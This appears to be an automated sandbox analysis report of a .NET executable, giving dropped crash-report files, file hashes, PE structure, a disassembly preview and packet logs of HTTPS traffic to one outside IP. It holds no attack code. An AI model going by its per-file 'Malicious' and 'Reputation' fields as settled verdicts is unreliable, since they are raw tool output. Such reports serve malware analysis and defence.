Preview:	MDMP..a..... .......`].f............$...........d...8.......<....).......)...u..........`.......8...........T............]..1............)...........+..............................................................................eJ......\,......GenuineIntel............T.......T...]].f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F3D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8428
Entropy (8bit):	3.7049945640608994
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+Fl6V06YeoSUvjgmfZdxyqpre89bcnsfLO0m:R6lXJW6G6YhSUbgmf0Acsfw
MD5:	1CE4FC25E9D4DDAE2BD89E53139B1AA1
SHA1:	238300FAEF3EF5E9027B47C7525F4550339CCF1F
SHA-256:	87D0009F2759886C6969CF8C5FACBC92F94CC12DA447D20F4DF577895126A422
SHA-512:	6F5E3870C402D748C4B0515D7C54911546E91A34B4F9A4EA7C8F3995D561E643A2C9C1ED18C53FD8BB30E9EEADD7B839474E3B59E523F27ECCD9483B9EEC343A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F8C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4767
Entropy (8bit):	4.506981574917603
Encrypted:	false
SSDEEP:	48:cvIwWl8zsSJg77aI9EvWpW8VYHYm8M4JaDwFEA+q8vaDdaUapd:uIjfgI7i+7VTJ6AKmHapd
MD5:	15F4CE8C83DA50D1A34FD8C752250305
SHA1:	B7165AA5DDDC08BC6A01F1D7C6F93E1DE29B717A
SHA-256:	EA0C6E4650B7190C30795E491F1F61973F0903904B2D287748E1A4DCFAE27B36
SHA-512:	EAE297C69B55B37B1223E4A397DF4B2DA0EEF606E19A71A367E5E24AC203B3D04C90036FD1954200C203A90E299A28B9AE3185DB9AE266EDF6FA378F1BEEDA36
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="394879" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.2989344641390135
Encrypted:	false
SSDEEP:	6144:RECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lySD6VJSRdT:mCsL6seqD5SLSWVARt
MD5:	269B01BD41E83A020EAFA3AA07C88598
SHA1:	4EC6E8EA4CE1710B6F757BB95D970B6B1A201DEE
SHA-256:	77BC57DBC89CA568DFFFBDC8D82F04BE6CDBF81A3D639160C22084EEDD6B1662
SHA-512:	6545518D5786DB54AD06D466F18B7E13714DB59C68D03C667E628FE12E494A089BBDF474AF17B5C55D1F4261C52B0F74419E65BB2F12F15F978553B9FDF8CE45
Malicious:	false
Reputation:	low
Preview:	regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...S..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.483642965681505
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	q86onx3LvU.exe
File size:	6'656 bytes
MD5:	3aa2339d295c90c1a0fbfad98e9cebd0
SHA1:	518a9c5b94df0ad8933b46c2ef3a0ad88fa01a77
SHA256:	74ef4e409c39d19ad4ed3bacde598f0b92c999de77961354300033f5a917b938
SHA512:	b727d4d7fe574b2ed752490133b73b547a674e911041b379e358679a3579c362923fcca3c8323beb1a4b295bd718cab7f9dc400ce6e1da6a786baf8bda79881c
SSDEEP:	96:0foBJwl5Vtub9VpfVEsFQ/5XEjgtp4k9O0MHSzPSczNt:coJSVgRVLDC5kgtpv9O0ASzam
TLSH:	ECD1A521A3D9433BD9B20FBA9D77A3500278A7015FA3DF6D2CC8490BA9557944A32B72
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:r{f.............................-... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x402dfe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x667B723A [Wed Jun 26 01:43:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2db4	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x59e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xe04	0x1000	4c2e61759de7e28cd0f9d1167874c8e6	False	0.528076171875	data	5.05014766625929	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x59e	0x600	4837d157d105b11ec5f096685f9d5be5	False	0.423828125	data	4.090094301293114	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	143f7fe129891cd1d12fbea0be8ccde6	False	0.041015625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x405c	0x31c	data			0.4296482412060301
RT_MANIFEST	0x43b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 16:17:02.114197969 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.114263058 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.114350080 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.155868053 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.155900002 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.626591921 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.626693010 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.630856991 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.630873919 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.631122112 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.672280073 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.677588940 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.720491886 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790029049 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790100098 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790131092 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790144920 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.790162086 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790195942 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790491104 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790515900 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.790523052 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790533066 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.790533066 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.790568113 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.790575027 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.791238070 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.791277885 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.791284084 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.844172955 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.844194889 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.876895905 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.876930952 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.876957893 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.876986980 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.876991987 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877019882 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877053976 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877068043 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877068043 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877079010 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877113104 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877120018 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877221107 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877255917 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877260923 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877268076 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877304077 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.877310991 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.877998114 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878026962 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878041029 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.878050089 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878092051 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.878468037 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878515959 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878621101 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.878627062 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878658056 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878684044 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878701925 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.878707886 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.878742933 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.879404068 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.879492044 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.879520893 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.879523993 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.879534960 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.879576921 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.963665009 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.963918924 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.963946104 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.963978052 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.963984966 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.964010000 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.964027882 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.964832067 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.964865923 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.964886904 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.964896917 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.964920044 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.965224028 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.965276957 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.965284109 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.965926886 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.965987921 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.965996027 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.966037989 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.966056108 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.966103077 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.966449022 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.966511965 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.966996908 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.967061043 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.967070103 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.967114925 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.967861891 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.967919111 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.967940092 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.967988968 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.968745947 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.968799114 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.968918085 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.968988895 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:02.969485044 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:02.969541073 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.050735950 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.050790071 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.050816059 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.050849915 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.050863028 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.050894976 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.050898075 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.050911903 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.050944090 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051203012 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051297903 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051304102 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051351070 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051383972 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051433086 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051495075 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051543951 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051759005 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051817894 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.051898956 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.051950932 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052135944 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.052170992 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.052186012 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052191973 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.052220106 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052237988 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052867889 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.052911997 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052917957 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.052970886 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.052978992 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053030014 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.053483009 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053534031 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.053642988 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053693056 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.053813934 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053853035 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053870916 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.053877115 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.053889990 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054450989 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054503918 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054511070 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054549932 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054656029 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054706097 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054778099 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054830074 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054838896 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054867029 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054887056 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054893970 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.054910898 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.054929018 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055542946 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.055615902 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055649996 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.055700064 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055743933 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055840969 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.055872917 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.055890083 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055896997 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.055913925 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.055960894 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.068085909 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.137481928 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.137542009 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.137651920 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.137676001 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.137712955 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.138066053 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.138087988 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.138132095 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.138142109 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.138165951 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.138533115 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.138550997 CEST	443	49704	104.21.10.178	192.168.2.11
Jul 3, 2024 16:17:03.138587952 CEST	49704	443	192.168.2.11	104.21.10.178
Jul 3, 2024 16:17:03.138597012 CEST	443	49704	104.21.10.178	192.168.2.11
